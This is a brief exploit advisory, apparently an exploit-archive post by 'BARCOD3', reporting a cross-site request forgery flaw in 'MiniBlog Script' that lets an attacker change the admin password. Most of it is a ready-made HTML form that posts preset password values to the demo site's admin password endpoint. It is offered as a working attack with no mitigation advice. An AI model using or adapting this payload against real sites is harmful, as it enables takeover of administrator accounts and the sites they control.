< ------------------- header data start ------------------- >


#############################################################

# Application Name : MiniBlog Script

# Vulnerable Type : XSRF

# Infection : Admin Account password change edilebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://www.bpowerhouse.com/demos/miniblog/index.php?admin=login

# Home : ozkanbozkurt.com
#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >
<h3>BARCOD3</h3>
<form action=’http://www.bpowerhouse.com/demos/miniblog/index.php?admin=password’ method=’post’>
<input class=form_text name=password_one type=password size=15 maxlength=15 value=passWORD></td>
<input class=form_text name=password_two type=password size=15 maxlength=15 value=passWORD></td>
<input class=form_button type=submit name=submit value=Change password></td>

</form>
< -- bug code end of -- >